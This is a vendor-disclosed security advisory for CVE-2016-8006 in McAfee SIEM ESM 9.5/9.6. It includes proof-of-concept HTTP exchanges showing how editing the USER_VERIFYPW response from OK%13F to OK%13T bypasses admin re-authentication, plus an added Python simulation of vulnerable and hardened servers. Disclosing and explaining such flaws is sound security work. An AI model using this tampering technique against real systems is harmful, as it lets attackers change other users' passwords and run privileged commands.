
    12-09-2016

    Quantum Leap Advisory McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability
    Affected Product: SIEM 9.5 and 9.6.
    Credits: Vulnerability discovered by Claudio Cinquino of Quantum Leap S.R.L.
    CVE: CVE-2016-8006

    Executive Summary

SIEM 9.5 and 9.6.0 allow an administrative user to change other SIEM users’ information, including their passwords, without supplying the current admin password a second time. Likewise, a logged-in admin can run GUI “Terminal” commands without re-entering the admin password. In both cases the re-authentication prompt is shown, but its result is only enforced by the client, so the server's answer can be rewritten in transit.

    Proof of Concept

An Authentication Bypass vulnerability (CWE-592 [1]) was found in the “Users and Groups” and “Terminal” forms of McAfee SIEM ESM 9.5.x and 9.6.x. When the admin password is requested a second time, the Flash client sends it to the server in a USER_VERIFYPW call and the server replies with OK%13F (wrong password) or OK%13T (correct password); the decision to continue is then taken by the client alone. To bypass the check, type any password into the re-authentication prompt, intercept the server's response with a proxy and change OK%13F to OK%13T; the client proceeds as if the password had been verified. In the bodies below, %13 (0x13) separates a key from its value and %14 (0x14) terminates each record. Because F and T have the same length, the Content-Length of 48 does not need to be adjusted.

    Authentication Bypass vulnerability on Users and Groups

    Request:
    POST /ess HTTP/1.1
    Host: 192.168.164.110
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: https://192.168.164.110/Application.swf
    Content-type: application/x-www-form-urlencoded
    Content-Length: 72

    Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

    Original Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:08:31 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

    Edited Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:08:31 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14

    Authentication Bypass vulnerability on Terminal

    Request:
    POST /ess HTTP/1.1
    Host: 192.168.164.110
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: https://192.168.164.110/Application.swf
    Content-type: application/x-www-form-urlencoded
    Content-Length: 72

    Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

    Original Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:13:57 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

    Edited Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:13:57 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14
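The following is an added example, not code from the advisory, from Quantum Leap or from McAfee. It decodes the delimiter-based /ess body format visible in the PoC above, reproduces the OK%13F to OK%13T edit, and then models both sides of the bypass: a client that trusts the USER_VERIFYPW answer, against a toy server that never checks that answer again (the behaviour the PoC exploits) and against one that keeps the verification result in server-side session state. The USER_SETPW call with its USER and NEWPW fields, the session model, the error code EC=1 and the ToyEsmServer class are assumptions made for the simulation; whether the hardened variant matches the vendor's actual fix in 9.6.0 MR3 is not stated on this page.

```python
# Added example for this advisory (not code from Quantum Leap or McAfee).
# Decodes the /ess body format seen in the PoC, reproduces the response edit,
# and contrasts client-enforced with server-enforced re-authentication.
# USER_SETPW, its USER/NEWPW fields, the session model and EC=1 are assumptions.
from urllib.parse import quote, unquote

FS = "\x13"  # %13: separates a key from its value
RS = "\x14"  # %14: terminates a key/value record

# Bodies copied from the advisory's PoC (the "Request="/"Response=" prefix removed).
POC_REQUEST = "API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14"
POC_RESPONSE_ORIG = "EC%130%13%14OK%13F%13%14DCHNG%13F%13%14"
POC_RESPONSE_EDITED = "EC%130%13%14OK%13T%13%14DCHNG%13F%13%14"


def decode_ess(body: str) -> list:
    """URL-decode a /ess body and split it into ordered (key, value) pairs."""
    pairs = []
    for record in unquote(body).split(RS):
        if record:  # the body ends with RS, so the last piece is empty
            key, _, value = record.partition(FS)
            pairs.append((key, value.rstrip(FS)))
    return pairs


def encode_ess(pairs) -> str:
    """Inverse of decode_ess: key FS value FS RS per record, then URL-encode."""
    raw = "".join(f"{k}{FS}{v}{FS}{RS}" for k, v in pairs)
    return quote(raw, safe="")


def flip_verifypw_response(body: str) -> str:
    """What the intercepting proxy does in the PoC: rewrite OK=F to OK=T.
    'F' and 'T' have the same length, so Content-Length needs no change."""
    return encode_ess([(k, "T" if k == "OK" else v) for k, v in decode_ess(body)])


class ToyEsmServer:
    """Minimal stand-in for the /ess endpoint (hypothetical). With
    enforce_reauth=False the server answers USER_VERIFYPW honestly but never
    consults that result again, which is the pattern the PoC exploits. With
    enforce_reauth=True the result is kept in server-side session state and
    checked before a privileged change."""

    def __init__(self, admin_password: str, enforce_reauth: bool):
        self.admin_password = admin_password
        self.enforce_reauth = enforce_reauth
        self.sessions = {}                       # SID -> {"reauth_ok": bool}
        self.user_passwords = {"alice": "alice-old"}  # constructed sample user

    def handle(self, body: str) -> str:
        fields = dict(decode_ess(body))
        session = self.sessions.setdefault(fields["SID"], {"reauth_ok": False})
        if fields["API"] == "USER_VERIFYPW":
            ok = fields["PW"] == self.admin_password
            session["reauth_ok"] = ok
            # DCHNG is copied from the PoC; its meaning is not documented on the page.
            return encode_ess([("EC", "0"), ("OK", "T" if ok else "F"), ("DCHNG", "F")])
        if fields["API"] == "USER_SETPW":        # hypothetical API name
            if self.enforce_reauth and not session["reauth_ok"]:
                return encode_ess([("EC", "1"), ("OK", "F")])  # hypothetical refusal
            self.user_passwords[fields["USER"]] = fields["NEWPW"]
            session["reauth_ok"] = False         # one verification, one change
            return encode_ess([("EC", "0"), ("OK", "T")])
        raise ValueError(f"unknown API {fields['API']!r}")


def client_change_password(server, sid, typed_password, target_user, new_password,
                           tamper=False) -> bool:
    """Models the Flash client's flow: send the password typed into the
    re-authentication prompt as USER_VERIFYPW and continue only if OK=T.
    With tamper=True the verify response is edited in transit as in the PoC."""
    verify = server.handle(encode_ess([("API", "USER_VERIFYPW"), ("SID", sid),
                                       ("PW", typed_password)]))
    if tamper:
        verify = flip_verifypw_response(verify)
    if dict(decode_ess(verify)).get("OK") != "T":
        return False                             # client-side gate closes
    change = server.handle(encode_ess([("API", "USER_SETPW"), ("SID", sid),
                                       ("USER", target_user), ("NEWPW", new_password)]))
    return dict(decode_ess(change)).get("OK") == "T"


if __name__ == "__main__":
    vulnerable = ToyEsmServer("real-admin-pw", enforce_reauth=False)
    hardened = ToyEsmServer("real-admin-pw", enforce_reauth=True)
    print("wrong pw, no tamper, vulnerable:", client_change_password(vulnerable, "1", "test", "alice", "pwned"))
    print("wrong pw, tamper, vulnerable:   ", client_change_password(vulnerable, "1", "test", "alice", "pwned", tamper=True))
    print("wrong pw, tamper, hardened:     ", client_change_password(hardened, "2", "test", "alice", "pwned", tamper=True))
    print("right pw, no tamper, hardened:  ", client_change_password(hardened, "3", "real-admin-pw", "alice", "rotated"))
```

The first two calls reproduce the PoC: with the wrong password the client stops on its own, but once the OK field is flipped the change request goes through because the server never re-checks. The hardened server ignores what the client believes and refuses the change unless its own session saw a successful USER_VERIFYPW, which is the property a re-authentication prompt has to have to be worth anything.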

Figure 1 shows an example of the Authentication Bypass on McAfee SIEM 9.5 and 9.6 for “Users and Groups”.

    Figure 1 – “Users and Groups” Authentication Bypass Vulnerability McAfee SIEM ESM 9.5.0MR7 PoC

    Solution

To fix the security issue, update to SIEM 9.6.0 MR3, in which the vendor has resolved it (see the McAfee KB article [3]).

    Disclosure Timeline

    11/05/2016 – Vulnerability Discovered
    12/05/2016 – Initial vendor notification
    09/09/2016 – The vendor fixed the vulnerability
09/09/2016 – The vendor published the Knowledge Base article KB87744 [3]
    16/09/2016 – CVE Assigned

    References

    [1] http://cwe.mitre.org/data/definitions/592.html
    [2] https://www.owasp.org/index.php/Category:Authentication_Vulnerability
    [3] https://kc.mcafee.com/corporate/index?page=content&id=KB87744

Claudio Cinquino
Security Auditor at Quantum Leap s.r.l.